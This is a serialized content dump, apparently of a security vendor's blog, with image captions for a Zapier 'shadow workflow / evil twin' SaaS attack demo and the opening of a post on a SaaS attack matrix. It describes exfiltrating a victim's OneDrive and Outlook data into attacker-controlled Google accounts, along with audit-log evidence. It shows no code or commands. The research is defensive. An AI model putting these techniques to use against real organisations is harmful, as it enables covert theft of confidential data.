ype":860},{},[64990],{"data":64991,"marks":64992,"value":61195,"nodeType":864},{},[],{"data":64994,"content":64995,"nodeType":860},{},[64996],{"data":64997,"marks":64998,"value":61202,"nodeType":864},{},[],{"data":65000,"content":65001,"nodeType":860},{},[65002],{"data":65003,"marks":65004,"value":61209,"nodeType":864},{},[],{"data":65006,"content":65007,"nodeType":860},{},[65008],{"data":65009,"marks":65010,"value":61216,"nodeType":864},{},[],{"data":65012,"content":65013,"nodeType":860},{},[65014],{"data":65015,"marks":65016,"value":61223,"nodeType":864},{},[],{"data":65018,"content":65019,"nodeType":860},{},[65020],{"data":65021,"marks":65022,"value":61230,"nodeType":864},{},[],{"data":65024,"content":65027,"nodeType":996},{"target":65025},{"sys":65026},{"id":61235,"type":1001,"linkType":1002},[],{"data":65029,"content":65030,"nodeType":1009},{},[65031],{"data":65032,"marks":65033,"value":61243,"nodeType":864},{},[],{"data":65035,"content":65036,"nodeType":860},{},[65037,65040,65047],{"data":65038,"marks":65039,"value":61250,"nodeType":864},{},[],{"data":65041,"content":65042,"nodeType":883},{"uri":61253},[65043],{"data":65044,"marks":65045,"value":61259,"nodeType":864},{},[65046],{"type":1455},{"data":65048,"marks":65049,"value":61263,"nodeType":864},{},[],{"data":65051,"content":65052,"nodeType":1312},{},[65053],{"data":65054,"marks":65055,"value":61270,"nodeType":864},{},[],{"data":65057,"content":65058,"nodeType":860},{},[65059,65062,65069],{"data":65060,"marks":65061,"value":61277,"nodeType":864},{},[],{"data":65063,"content":65064,"nodeType":883},{"uri":61280},[65065],{"data":65066,"marks":65067,"value":61280,"nodeType":864},{},[65068],{"type":1455},{"data":65070,"marks":65071,"value":61289,"nodeType":864},{},[],{"data":65073,"content":65076,"nodeType":996},{"target":65074},{"sys":65075},{"id":61294,"type":1001,"linkType":1002},[],{"data":65078,"content":65081,"nodeType":996},{"target":65079},{"sys":65080},{"id":61300,"type":1001,"linkType":1002},[],{"data":65083,"content":65086,"nodeType":996},{"target":65084},{"sys":65085},{"id":61306,"type":1001,"linkType":1002},[],{"data":65088,"content":65089,"nodeType":1312},{},[65090],{"data":65091,"marks":65092,"value":61314,"nodeType":864},{},[],{"data":65094,"content":65095,"nodeType":860},{},[65096],{"data":65097,"marks":65098,"value":61321,"nodeType":864},{},[],{"data":65100,"content":65101,"nodeType":860},{},[65102],{"data":65103,"marks":65104,"value":61328,"nodeType":864},{},[],{"data":65106,"content":65109,"nodeType":996},{"target":65107},{"sys":65108},{"id":61333,"type":1001,"linkType":1002},[],{"data":65111,"content":65114,"nodeType":996},{"target":65112},{"sys":65113},{"id":61339,"type":1001,"linkType":1002},[],{"data":65116,"content":65117,"nodeType":1009},{},[65118],{"data":65119,"marks":65120,"value":61347,"nodeType":864},{},[],{"data":65122,"content":65123,"nodeType":860},{},[65124],{"data":65125,"marks":65126,"value":61354,"nodeType":864},{},[],{"data":65128,"content":65129,"nodeType":860},{},[65130],{"data":65131,"marks":65132,"value":61361,"nodeType":864},{},[],{"data":65134,"content":65135,"nodeType":1312},{},[65136],{"data":65137,"marks":65138,"value":61368,"nodeType":864},{},[],{"data":65140,"content":65141,"nodeType":860},{},[65142],{"data":65143,"marks":65144,"value":61375,"nodeType":864},{},[],{"data":65146,"content":65149,"nodeType":996},{"target":65147},{"sys":65148},{"id":61380,"type":1001,"linkType":1002},[],{"data":65151,"content":65152,"nodeType":860},{},[65153,65156,65163],{"data":65154,"marks":65155,"value":61388,"nodeType":864},{},[],{"data":65157,"content":65158,"nodeType":883},{"uri":60804},[65159],{"data":65160,"marks":65161,"value":60810,"nodeType":864},{},[65162],{"type":1455},{"data":65164,"marks":65165,"value":61399,"nodeType":864},{},[],{"data":65167,"content":65168,"nodeType":860},{},[65169,65172,65179],{"data":65170,"marks":65171,"value":61406,"nodeType":864},{},[],{"data":65173,"content":65174,"nodeType":883},{"uri":61409},[65175],{"data":65176,"marks":65177,"value":61415,"nodeType":864},{},[65178],{"type":1455},{"data":65180,"marks":65181,"value":61419,"nodeType":864},{},[],{"data":65183,"content":65184,"nodeType":860},{},[65185],{"data":65186,"marks":65187,"value":61426,"nodeType":864},{},[],{"data":65189,"content":65192,"nodeType":996},{"target":65190},{"sys":65191},{"id":61431,"type":1001,"linkType":1002},[],{"data":65194,"content":65197,"nodeType":996},{"target":65195},{"sys":65196},{"id":61437,"type":1001,"linkType":1002},[],{"data":65199,"content":65200,"nodeType":860},{},[65201],{"data":65202,"marks":65203,"value":61445,"nodeType":864},{},[],{"data":65205,"content":65206,"nodeType":1312},{},[65207],{"data":65208,"marks":65209,"value":61452,"nodeType":864},{},[],{"data":65211,"content":65212,"nodeType":860},{},[65213],{"data":65214,"marks":65215,"value":61459,"nodeType":864},{},[],{"data":65217,"content":65218,"nodeType":860},{},[65219],{"data":65220,"marks":65221,"value":61466,"nodeType":864},{},[],{"data":65223,"content":65224,"nodeType":941},{},[65225,65234],{"data":65226,"content":65227,"nodeType":945},{},[65228],{"data":65229,"content":65230,"nodeType":860},{},[65231],{"data":65232,"marks":65233,"value":61479,"nodeType":864},{},[],{"data":65235,"content":65236,"nodeType":945},{},[65237],{"data":65238,"content":65239,"nodeType":860},{},[65240],{"data":65241,"marks":65242,"value":61489,"nodeType":864},{},[],{"data":65244,"content":65247,"nodeType":996},{"target":65245},{"sys":65246},{"id":61494,"type":1001,"linkType":1002},[],{"data":65249,"content":65252,"nodeType":996},{"target":65250},{"sys":65251},{"id":61500,"type":1001,"linkType":1002},[],{"data":65254,"content":65255,"nodeType":860},{},[65256],{"data":65257,"marks":65258,"value":61508,"nodeType":864},{},[],{"data":65260,"content":65261,"nodeType":860},{},[65262],{"data":65263,"marks":65264,"value":61515,"nodeType":864},{},[],{"data":65266,"content":65267,"nodeType":860},{},[65268],{"data":65269,"marks":65270,"value":61522,"nodeType":864},{},[],{"data":65272,"content":65273,"nodeType":860},{},[65274,65277],{"data":65275,"marks":65276,"value":61529,"nodeType":864},{},[],{"data":65278,"marks":65279,"value":14717,"nodeType":864},{},[65280],{"type":2246},{"data":65282,"content":65285,"nodeType":996},{"target":65283},{"sys":65284},{"id":61538,"type":1001,"linkType":1002},[],{"data":65287,"content":65288,"nodeType":860},{},[65289],{"data":65290,"marks":65291,"value":61546,"nodeType":864},{},[],{"data":65293,"content":65296,"nodeType":996},{"target":65294},{"sys":65295},{"id":61551,"type":1001,"linkType":1002},[],{"data":65298,"content":65301,"nodeType":996},{"target":65299},{"sys":65300},{"id":61557,"type":1001,"linkType":1002},[],{"data":65303,"content":65304,"nodeType":860},{},[65305],{"data":65306,"marks":65307,"value":61565,"nodeType":864},{},[],{"data":65309,"content":65310,"nodeType":1009},{},[65311],{"data":65312,"marks":65313,"value":61572,"nodeType":864},{},[],{"data":65315,"content":65316,"nodeType":860},{},[65317],{"data":65318,"marks":65319,"value":61579,"nodeType":864},{},[],{"data":65321,"content":65324,"nodeType":996},{"target":65322},{"sys":65323},{"id":61584,"type":1001,"linkType":1002},[],{"data":65326,"content":65329,"nodeType":996},{"target":65327},{"sys":65328},{"id":61590,"type":1001,"linkType":1002},[],{"data":65331,"content":65332,"nodeType":1009},{},[65333],{"data":65334,"marks":65335,"value":58288,"nodeType":864},{},[],{"data":65337,"content":65338,"nodeType":860},{},[65339],{"data":65340,"marks":65341,"value":61604,"nodeType":864},{},[],{"data":65343,"content":65344,"nodeType":941},{},[65345,65354,65363,65372,65381,65429,65438],{"data":65346,"content":65347,"nodeType":945},{},[65348],{"data":65349,"content":65350,"nodeType":860},{},[65351],{"data":65352,"marks":65353,"value":61617,"nodeType":864},{},[],{"data":65355,"content":65356,"nodeType":945},{},[65357],{"data":65358,"content":65359,"nodeType":860},{},[65360],{"data":65361,"marks":65362,"value":61627,"nodeType":864},{},[],{"data":65364,"content":65365,"nodeType":945},{},[65366],{"data":65367,"content":65368,"nodeType":860},{},[65369],{"data":65370,"marks":65371,"value":61637,"nodeType":864},{},[],{"data":65373,"content":65374,"nodeType":945},{},[65375],{"data":65376,"content":65377,"nodeType":860},{},[65378],{"data":65379,"marks":65380,"value":61647,"nodeType":864},{},[],{"data":65382,"content":65383,"nodeType":945},{},[65384,65390],{"data":65385,"content":65386,"nodeType":860},{},[65387],{"data":65388,"marks":65389,"value":61657,"nodeType":864},{},[],{"data":65391,"content":65392,"nodeType":941},{},[65393,65402,65411,65420],{"data":65394,"content":65395,"nodeType":945},{},[65396],{"data":65397,"content":65398,"nodeType":860},{},[65399],{"data":65400,"marks":65401,"value":61670,"nodeType":864},{},[],{"data":65403,"content":65404,"nodeType":945},{},[65405],{"data":65406,"content":65407,"nodeType":860},{},[65408],{"data":65409,"marks":65410,"value":61680,"nodeType":864},{},[],{"data":65412,"content":65413,"nodeType":945},{},[65414],{"data":65415,"content":65416,"nodeType":860},{},[65417],{"data":65418,"marks":65419,"value":61690,"nodeType":864},{},[],{"data":65421,"content":65422,"nodeType":945},{},[65423],{"data":65424,"content":65425,"nodeType":860},{},[65426],{"data":65427,"marks":65428,"value":61700,"nodeType":864},{},[],{"data":65430,"content":65431,"nodeType":945},{},[65432],{"data":65433,"content":65434,"nodeType":860},{},[65435],{"data":65436,"marks":65437,"value":61710,"nodeType":864},{},[],{"data":65439,"content":65440,"nodeType":945},{},[65441],{"data":65442,"content":65443,"nodeType":860},{},[65444],{"data":65445,"marks":65446,"value":61720,"nodeType":864},{},[],{"data":65448,"content":65449,"nodeType":1009},{},[65450],{"data":65451,"marks":65452,"value":24968,"nodeType":864},{},[],{"data":65454,"content":65455,"nodeType":860},{},[65456],{"data":65457,"marks":65458,"value":61733,"nodeType":864},{},[],{"data":65460,"content":65461,"nodeType":860},{},[65462],{"data":65463,"marks":65464,"value":61740,"nodeType":864},{},[],{"entries":65466},{"inline":65467,"hyperlink":65468,"block":65471},[],[65469],{"sys":65470,"__typename":2059,"title":5236,"slug":59151},{"id":58881},[65472,65479,65488,65495,65503,65510,65518,65526,65534,65542,65549,65557,65564,65572,65580,65587,65594],{"sys":65473,"__typename":1724,"title":65474,"caption":65475,"layoutMode":59,"file":65476},{"id":61110},"Azure audit logs","Azure audit logs showing a new user consent for a Zapier integration already in use by other users inside the organization",{"url":65477,"width":1736,"height":65478},"https://images.ctfassets.net/y1cdw1ablpvd/7KXqNa7LYhg9RpMODcCOUA/cf5cc3c63c3fb23bf4db4fc687c52fef/image11.png",188,{"sys":65480,"__typename":65481,"title":65482,"youTubeUrl":65483,"imagePlaceholder":65484},{"id":61235},"ExternalVideo","SaaS Attacks: Shadow workflows + Evil twin integration demo","https://youtu.be/g2EITjjJH1s",{"url":65485,"width":65486,"height":65487},"https://images.ctfassets.net/y1cdw1ablpvd/2XKFsSaDVmUREXzFIFvdgs/41ff444655d2f740bf4c637ebea0e998/Screenshot_2023-09-11_at_10.25.12_AM.png",2996,1616,{"sys":65489,"__typename":1724,"title":65490,"caption":65491,"layoutMode":59,"file":65492},{"id":61294},"Apps used in Microsoft","Listing apps installed for the user from myapps.microsoft.com ",{"url":65493,"width":27843,"height":65494},"https://images.ctfassets.net/y1cdw1ablpvd/66ISP7TGcsDns9BPvJEz0V/70b5da6883efde3122cabd3c0c1f1eab/image3.png",860,{"sys":65496,"__typename":1724,"title":65497,"caption":65498,"layoutMode":59,"file":65499},{"id":61300},"Zapier to do","Listing granted permissions for Zapier-related apps (1/2)",{"url":65500,"width":65501,"height":65502},"https://images.ctfassets.net/y1cdw1ablpvd/7lJRrtsR1GuWBGGk3d5FJ2/387c9f8f178e9a8c10e60f5b2ebf026b/image7.png",1108,546,{"sys":65504,"__typename":1724,"title":65505,"caption":65506,"layoutMode":59,"file":65507},{"id":61306},"Zapier-related app permissions","Listing granted permissions for Zapier-related apps (2/2)",{"url":65508,"width":65509,"height":62658},"https://images.ctfassets.net/y1cdw1ablpvd/9KWSW4Dyy0hfMCa8NzUsP/8bacb7994fd4668fc181c1d4ac190002/image8.png",1729,{"sys":65511,"__typename":1724,"title":65512,"caption":65513,"layoutMode":59,"file":65514},{"id":61333},"Finding a Zapier integration","Listing app role assignments and finding a Zapier integration",{"url":65515,"width":65516,"height":65517},"https://images.ctfassets.net/y1cdw1ablpvd/lkccBtCqQj594UJeRoStz/f4dd2c2deda29907c0e5ab3ed506b375/image4.png",774,430,{"sys":65519,"__typename":1724,"title":65520,"caption":65521,"layoutMode":59,"file":65522},{"id":61339},"Zapier integration OAuth permissions","Listing OAuth permission grants for the Zapier integration to confirm permissions",{"url":65523,"width":65524,"height":65525},"https://images.ctfassets.net/y1cdw1ablpvd/4eZco97TV404HaHoAnYGSA/04e5e66ae37fa8ee52418d5533437386/image15.png",1219,395,{"sys":65527,"__typename":1724,"title":65528,"caption":65529,"layoutMode":59,"file":65530},{"id":61380},"Zapier login via SSO","Login to Zapier via SSO or social login",{"url":65531,"width":65532,"height":65533},"https://images.ctfassets.net/y1cdw1ablpvd/57LigpMizflfTbTcfrcRwM/e81063c2a092be712cc180f1af1ee909/image10.png",1244,736,{"sys":65535,"__typename":1724,"title":65536,"caption":65537,"layoutMode":59,"file":65538},{"id":61431},"User's Zapier workflows","The user’s existing workflows, or “Zaps” in Zapier terminology",{"url":65539,"width":65540,"height":65541},"https://images.ctfassets.net/y1cdw1ablpvd/1HD2bnkcnGnc5YQAHHrvIa/08b1a537a9f63d0fb600d837eee1df25/image14.png",1426,382,{"sys":65543,"__typename":1724,"title":65544,"caption":65545,"layoutMode":59,"file":65546},{"id":61437},"Zapier integrations","The user’s connected apps, showing Outlook and OneDrive have already been integrated",{"url":65547,"width":65509,"height":65548},"https://images.ctfassets.net/y1cdw1ablpvd/4RII43nqlcqFT4E7QuGOGT/ef85aa394465906185bc52985f4b28e8/image2.png",532,{"sys":65550,"__typename":1724,"title":65551,"caption":65552,"layoutMode":59,"file":65553},{"id":61494},"Connecting our accounts","We have connected the user’s Outlook and OneDrive, as well as our own Gmail and Google Drive for exfiltration",{"url":65554,"width":65555,"height":65556},"https://images.ctfassets.net/y1cdw1ablpvd/7gmTTPtcrhbPDrQD1BId55/26c7fd0a5d1391bd5ec627c73af587db/image16.png",854,419,{"sys":65558,"__typename":1724,"title":65559,"caption":65560,"layoutMode":59,"file":65561},{"id":61500},"Our shadow workflows","Shadow workflows we have created to monitor the target user’s emails and files",{"url":65562,"width":62702,"height":65563},"https://images.ctfassets.net/y1cdw1ablpvd/ggCqvwRtNLcvBVqvZMEF0/a9b0b60c80c835f6dca01c1fc408df08/image12.png",444,{"sys":65565,"__typename":1724,"title":65566,"caption":65567,"layoutMode":59,"file":65568},{"id":61538},"New sign-in events"," Interactive sign-in events caused by the new integrations with the new Zapier account",{"url":65569,"width":65570,"height":65571},"https://images.ctfassets.net/y1cdw1ablpvd/3W6qH6wxjm7fRRjuMeYtRD/779265dba840306f2002132abd24c060/image6.png",1256,148,{"sys":65573,"__typename":1724,"title":65574,"caption":65575,"layoutMode":59,"file":65576},{"id":61551},"What's shown in audit logs","Audit log showing the Zapier integration downloading a file - this is a result of the shadow workflow",{"url":65577,"width":65578,"height":65579},"https://images.ctfassets.net/y1cdw1ablpvd/ew0JDU7oER8cLZUxmyySV/cb39ead350b0704ac78b05c7c5445503/image9.png",569,535,{"sys":65581,"__typename":1724,"title":65582,"caption":65583,"layoutMode":59,"file":65584},{"id":61557},"Audit log showing file upload","Audit log showing the Zapier integration uploading a file - this is the result of the legitimate integration that forwards business expense emails",{"url":65585,"width":65578,"height":65586},"https://images.ctfassets.net/y1cdw1ablpvd/7uv04lFua20rYKyE9VsOv/a2893b9c5540e55732eb9acb62b79b0e/image5.png",609,{"sys":65588,"__typename":1724,"title":65589,"caption":65590,"layoutMode":59,"file":65591},{"id":61584},"Leaked doc in attacker's GDrive","Confidential document from OneDrive appears in Google Drive",{"url":65592,"width":65593,"height":56126},"https://images.ctfassets.net/y1cdw1ablpvd/5jwmXBmrQgA0fmHYn9CK4g/63a689ef0014f15f4cac05d47950e151/image13.png",1319,{"sys":65595,"__typename":1724,"title":65596,"caption":65597,"layoutMode":59,"file":65598},{"id":61590},"Leaked email to attacker's inbox","Confidential email from Outlook appears in GMail",{"url":65599,"width":65600,"height":65601},"https://images.ctfassets.net/y1cdw1ablpvd/7buoz26rTelsWCvn9H8eUq/af55d1b900b715e943b891535efac456/image1.png",1101,271,{"items":65603},[],{},"SaaS attack matrix: The shadow workflow’s evil twin",{"items":65607},[65608,66014,66812],{"__typename":2059,"sys":65609,"content":65610,"title":5236,"synopsis":60848,"hashTags":59,"publishedDate":60849,"slug":59151,"tagsCollection":66004,"authorsCollection":66010},{"id":58881},{"json":65611},{"data":65612,"content":65613,"nodeType":856},{},[65614,65630,65636,65642,65648,65664,65670,65686,65692,65698,65704,65710,65716,65722,65728,65744,65750,65756,65761,65767,65773,65779,65784,65789,65794,65800,65806,65811,65817,65823,65829,65834,65840,65846,65852,65858,65864,65869,65875,65881,65886,65892,65898,65903,65909,65915,65974,65980,65986,65992,65998],{"data":65615,"content":65616,"nodeType":860},{},[65617,65620,65627],{"data":65618,"marks":65619,"value":60406,"nodeType":864},{},[],{"data":65621,"content":65622,"nodeType":883},{"uri":6418},[65623],{"data":65624,"marks":65625,"value":5765,"nodeType":864},{},[65626],{"type":1455},{"data":65628,"marks":65629,"value":60417,"nodeType":864},{},[],{"data":65631,"content":65632,"nodeType":860},{},[65633],{"data":65634,"marks":65635,"value":60424,"nodeType":864},{},[],{"data":65637,"content":65638,"nodeType":860},{},[65639],{"data":65640,"marks":65641,"value":60431,"nodeType":864},{},[],{"data":65643,"content":65644,"nodeType":1009},{},[65645],{"data":65646,"marks":65647,"value":58596,"nodeType":864},{},[],{"data":65649,"content":65650,"nodeType":860},{},[65651,65654,65661],{"data":65652,"marks":65653,"value":21,"nodeType":864},{},[],{"data":65655,"content":65656,"nodeType":883},{"uri":58605},[65657],{"data":65658,"marks":65659,"value":58610,"nodeType":864},{},[65660],{"type":1455},{"data":65662,"marks":65663,"value":58614,"nodeType":864},{},[],{"data":65665,"content":65666,"nodeType":1009},{},[65667],{"data":65668,"marks":65669,"value":60460,"nodeType":864},{},[],{"data":65671,"content":65672,"nodeType":860},{},[65673,65676,65683],{"data":65674,"marks":65675,"value":21,"nodeType":864},{},[],{"data":65677,"content":65678,"nodeType":883},{"uri":40614},[65679],{"data":65680,"marks":65681,"value":5272,"nodeType":864},{},[65682],{"type":1455},{"data":65684,"marks":65685,"value":60477,"nodeType":864},{},[],{"data":65687,"content":65688,"nodeType":1009},{},[65689],{"data":65690,"marks":65691,"value":60484,"nodeType":864},{},[],{"data":65693,"content":65694,"nodeType":860},{},[65695],{"data":65696,"marks":65697,"value":60491,"nodeType":864},{},[],{"data":65699,"content":65700,"nodeType":860},{},[65701],{"data":65702,"marks":65703,"value":60498,"nodeType":864},{},[],{"data":65705,"content":65706,"nodeType":860},{},[65707],{"data":65708,"marks":65709,"value":60505,"nodeType":864},{},[],{"data":65711,"content":65712,"nodeType":860},{},[65713],{"data":65714,"marks":65715,"value":60512,"nodeType":864},{},[],{"data":65717,"content":65718,"nodeType":860},{},[65719],{"data":65720,"marks":65721,"value":60519,"nodeType":864},{},[],{"data":65723,"content":65724,"nodeType":1009},{},[65725],{"data":65726,"marks":65727,"value":60526,"nodeType":864},{},[],{"data":65729,"content":65730,"nodeType":860},{},[65731,65734,65741],{"data":65732,"marks":65733,"value":60533,"nodeType":864},{},[],{"data":65735,"content":65736,"nodeType":883},{"uri":60536},[65737],{"data":65738,"marks":65739,"value":60542,"nodeType":864},{},[65740],{"type":1455},{"data":65742,"marks":65743,"value":60546,"nodeType":864},{},[],{"data":65745,"content":65746,"nodeType":860},{},[65747],{"data":65748,"marks":65749,"value":60553,"nodeType":864},{},[],{"data":65751,"content":65752,"nodeType":860},{},[65753],{"data":65754,"marks":65755,"value":60560,"nodeType":864},{},[],{"data":65757,"content":65760,"nodeType":996},{"target":65758},{"sys":65759},{"id":60565,"type":1001,"linkType":1002},[],{"data":65762,"content":65763,"nodeType":860},{},[65764],{"data":65765,"marks":65766,"value":60573,"nodeType":864},{},[],{"data":65768,"content":65769,"nodeType":1312},{},[65770],{"data":65771,"marks":65772,"value":60580,"nodeType":864},{},[],{"data":65774,"content":65775,"nodeType":860},{},[65776],{"data":65777,"marks":65778,"value":60587,"nodeType":864},{},[],{"data":65780,"content":65783,"nodeType":996},{"target":65781},{"sys":65782},{"id":60592,"type":1001,"linkType":1002},[],{"data":65785,"content":65788,"nodeType":996},{"target":65786},{"sys":65787},{"id":60598,"type":1001,"linkType":1002},[],{"data":65790,"content":65793,"nodeType":996},{"target":65791},{"sys":65792},{"id":60604,"type":1001,"linkType":1002},[],{"data":65795,"content":65796,"nodeType":1312},{},[65797],{"data":65798,"marks":65799,"value":60612,"nodeType":864},{},[],{"data":65801,"content":65802,"nodeType":860},{},[65803],{"data":65804,"marks":65805,"value":60619,"nodeType":864},{},[],{"data":65807,"content":65810,"nodeType":996},{"target":65808},{"sys":65809},{"id":60624,"type":1001,"linkType":1002},[],{"data":65812,"content":65813,"nodeType":1312},{},[65814],{"data":65815,"marks":65816,"value":60632,"nodeType":864},{},[],{"data":65818,"content":65819,"nodeType":860},{},[65820],{"data":65821,"marks":65822,"value":60639,"nodeType":864},{},[],{"data":65824,"content":65825,"nodeType":860},{},[65826],{"data":65827,"marks":65828,"value":60646,"nodeType":864},{},[],{"data":65830,"content":65833,"nodeType":996},{"target":65831},{"sys":65832},{"id":60651,"type":1001,"linkType":1002},[],{"data":65835,"content":65836,"nodeType":860},{},[65837],{"data":65838,"marks":65839,"value":60659,"nodeType":864},{},[],{"data":65841,"content":65842,"nodeType":1009},{},[65843],{"data":65844,"marks":65845,"value":60666,"nodeType":864},{},[],{"data":65847,"content":65848,"nodeType":1312},{},[65849],{"data":65850,"marks":65851,"value":60673,"nodeType":864},{},[],{"data":65853,"content":65854,"nodeType":860},{},[65855],{"data":65856,"marks":65857,"value":60680,"nodeType":864},{},[],{"data":65859,"content":65860,"nodeType":860},{},[65861],{"data":65862,"marks":65863,"value":60687,"nodeType":864},{},[],{"data":65865,"content":65868,"nodeType":996},{"target":65866},{"sys":65867},{"id":60692,"type":1001,"linkType":1002},[],{"data":65870,"content":65871,"nodeType":1312},{},[65872],{"data":65873,"marks":65874,"value":60700,"nodeType":864},{},[],{"data":65876,"content":65877,"nodeType":860},{},[65878],{"data":65879,"marks":65880,"value":60707,"nodeType":864},{},[],{"data":65882,"content":65885,"nodeType":996},{"target":65883},{"sys":65884},{"id":60712,"type":1001,"linkType":1002},[],{"data":65887,"content":65888,"nodeType":860},{},[65889],{"data":65890,"marks":65891,"value":60720,"nodeType":864},{},[],{"data":65893,"content":65894,"nodeType":860},{},[65895],{"data":65896,"marks":65897,"value":60727,"nodeType":864},{},[],{"data":65899,"content":65902,"nodeType":996},{"target":65900},{"sys":65901},{"id":60732,"type":1001,"linkType":1002},[],{"data":65904,"content":65905,"nodeType":1009},{},[65906],{"data":65907,"marks":65908,"value":58288,"nodeType":864},{},[],{"data":65910,"content":65911,"nodeType":860},{},[65912],{"data":65913,"marks":65914,"value":60746,"nodeType":864},{},[],{"data":65916,"content":65917,"nodeType":941},{},[65918,65927,65936,65955],{"data":65919,"content":65920,"nodeType":945},{},[65921],{"data":65922,"content":65923,"nodeType":860},{},[65924],{"data":65925,"marks":65926,"value":60759,"nodeType":864},{},[],{"data":65928,"content":65929,"nodeType":945},{},[65930],{"data":65931,"content":65932,"nodeType":860},{},[65933],{"data":65934,"marks":65935,"value":60769,"nodeType":864},{},[],{"data":65937,"content":65938,"nodeType":945},{},[65939],{"data":65940,"content":65941,"nodeType":860},{},[65942,65945,65952],{"data":65943,"marks":65944,"value":60779,"nodeType":864},{},[],{"data":65946,"content":65947,"nodeType":883},{"uri":60782},[65948],{"data":65949,"marks":65950,"value":60788,"nodeType":864},{},[65951],{"type":1455},{"data":65953,"marks":65954,"value":21,"nodeType":864},{},[],{"data":65956,"content":65957,"nodeType":945},{},[65958],{"data":65959,"content":65960,"nodeType":860},{},[65961,65964,65971],{"data":65962,"marks":65963,"value":60801,"nodeType":864},{},[],{"data":65965,"content":65966,"nodeType":883},{"uri":60804},[65967],{"data":65968,"marks":65969,"value":60810,"nodeType":864},{},[65970],{"type":1455},{"data":65972,"marks":65973,"value":21,"nodeType":864},{},[],{"data":65975,"content":65976,"nodeType":860},{},[65977],{"data":65978,"marks":65979,"value":60820,"nodeType":864},{},[],{"data":65981,"content":65982,"nodeType":1312},{},[65983],{"data":65984,"marks":65985,"value":24968,"nodeType":864},{},[],{"data":65987,"content":65988,"nodeType":860},{},[65989],{"data":65990,"marks":65991,"value":60833,"nodeType":864},{},[],{"data":65993,"content":65994,"nodeType":860},{},[65995],{"data":65996,"marks":65997,"value":60840,"nodeType":864},{},[],{"data":65999,"content":66000,"nodeType":860},{},[66001],{"data":66002,"marks":66003,"value":60847,"nodeType":864},{},[],{"items":66005},[66006,66008],{"sys":66007,"name":6593},{"id":6592},{"sys":66009,"name":342},{"id":6596},{"items":66011},[66012],{"fullName":4949,"firstName":4950,"jobTitle":4951,"profilePicture":66013},{"url":4955},{"__typename":2059,"sys":66015,"content":66017,"title":66798,"synopsis":66799,"hashTags":59,"publishedDate":66800,"slug":66801,"tagsCollection":66802,"authorsCollection":66808},{"id":66016},"6VZQJzQ2FNetGNMEjiuXB2",{"json":66018},{"data":66019,"content":66020,"nodeType":856},{},[66021,66028,66035,66042,66049,66056,66063,66069,66086,66093,66136,66143,66150,66194,66213,66220,66227,66234,66254,66272,66279,66312,66319,66337,66344,66351,66381,66401,66408,66413,66420,66427,66434,66441,66448,66455,66462,66469,66476,66483,66490,66497,66513,66520,66590,66597,66604,66633,66648,66655,66662,66669,66702,66722,66729,66736,66743,66750,66769,66787,66792],{"data":66022,"content":66023,"nodeType":860},{},[66024],{"data":66025,"marks":66026,"value":66027,"nodeType":864},{},[],"Our goal at Push is simple — to stop identity attacks. Today, the vast majority of identity vulnerabilities exist in the context of SaaS apps. ",{"data":66029,"content":66030,"nodeType":860},{},[66031],{"data":66032,"marks":66033,"value":66034,"nodeType":864},{},[],"The reasons for this are clear: Security teams have reduced central oversight and control over SaaS apps than they are used to, these apps exist in large numbers per company, and the identities that are used to access these apps are... complicated, to say the least. Securing hundreds of apps, with thousands of associated identities, is therefore no mean feat. ",{"data":66036,"content":66037,"nodeType":860},{},[66038],{"data":66039,"marks":66040,"value":66041,"nodeType":864},{},[],"Securing SaaS use means building controls that are easy to use, easy to understand — and ultimately effective. Not just effective against the hand-wavy concept of “SaaS attacks,” but specific techniques — the most common techniques that are likely to cause real damage.",{"data":66043,"content":66044,"nodeType":860},{},[66045],{"data":66046,"marks":66047,"value":66048,"nodeType":864},{},[],"To talk about this, we need to have a shared understanding of what these techniques are. To get that conversation going, we’ve pulled together all the techniques we're aware of, and our research team has even added a bunch of new ones.",{"data":66050,"content":66051,"nodeType":1009},{},[66052],{"data":66053,"marks":66054,"value":66055,"nodeType":864},{},[],"The SaaS attack matrix",{"data":66057,"content":66058,"nodeType":860},{},[66059],{"data":66060,"marks":66061,"value":66062,"nodeType":864},{},[],"We’ve taken inspiration from the MITRE ATT&CK framework (certainly intended as the sincerest form of flattery), but wanted to make a conscious break away from the endpoint-focused ATT&CK techniques and instead focus on techniques that are SaaS-specific. In fact, these techniques don’t touch endpoints (so they bypass EDR) or customer networks (so they bypass network detection) — so we’re calling them networkless attacks.",{"data":66064,"content":66068,"nodeType":996},{"target":66065},{"sys":66066},{"id":66067,"type":1001,"linkType":1002},"768Zv5gTVHyu5rbzJAzL4F",[],{"data":66070,"content":66071,"nodeType":860},{},[66072,66076,66083],{"data":66073,"marks":66074,"value":66075,"nodeType":864},{},[],"You can find more detailed descriptions of these techniques (and hopefully PRs for some we missed) on ",{"data":66077,"content":66078,"nodeType":883},{"uri":6418},[66079],{"data":66080,"marks":66081,"value":6423,"nodeType":864},{},[66082],{"type":1455},{"data":66084,"marks":66085,"value":2924,"nodeType":864},{},[],{"data":66087,"content":66088,"nodeType":860},{},[66089],{"data":66090,"marks":66091,"value":66092,"nodeType":864},{},[],"Since we’re not targeting endpoints, let’s talk about the new targets: The accounts/identities on SaaS apps. We found it was useful to think about these identities not as standalone isolated islands — but much more like a graph; less a single web-server on the internet and more like many Windows endpoints on an Active Directory. ",{"data":66094,"content":66095,"nodeType":860},{},[66096,66100,66108,66111,66119,66123,66132],{"data":66097,"marks":66098,"value":66099,"nodeType":864},{},[],"You can leverage this access to an identity on a trusted platform to target (so laterally move or escalate privilege to) other users or identities. For example, attacks like using access to SaaS apps to ",{"data":66101,"content":66102,"nodeType":883},{"uri":48092},[66103],{"data":66104,"marks":66105,"value":66107,"nodeType":864},{},[66106],{"type":1455},"phish other employees through comments",{"data":66109,"marks":66110,"value":902,"nodeType":864},{},[],{"data":66112,"content":66113,"nodeType":883},{"uri":57775},[66114],{"data":66115,"marks":66116,"value":66118,"nodeType":864},{},[66117],{"type":1455},"spoofing users on IM platforms",{"data":66120,"marks":66121,"value":66122,"nodeType":864},{},[]," to social engineer them there — or perhaps ",{"data":66124,"content":66126,"nodeType":883},{"uri":66125},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/link_backdooring/description.md",[66127],{"data":66128,"marks":66129,"value":66131,"nodeType":864},{},[66130],{"type":1455},"backdooring links",{"data":66133,"marks":66134,"value":66135,"nodeType":864},{},[]," in documents.",{"data":66137,"content":66138,"nodeType":860},{},[66139],{"data":66140,"marks":66141,"value":66142,"nodeType":864},{},[],"In this case, unusually, it’s not the data in these hundreds of SaaS apps that create risk, and you need to consider low-risk (from a data perspective) apps as a vector to pivot to higher-risk apps in your 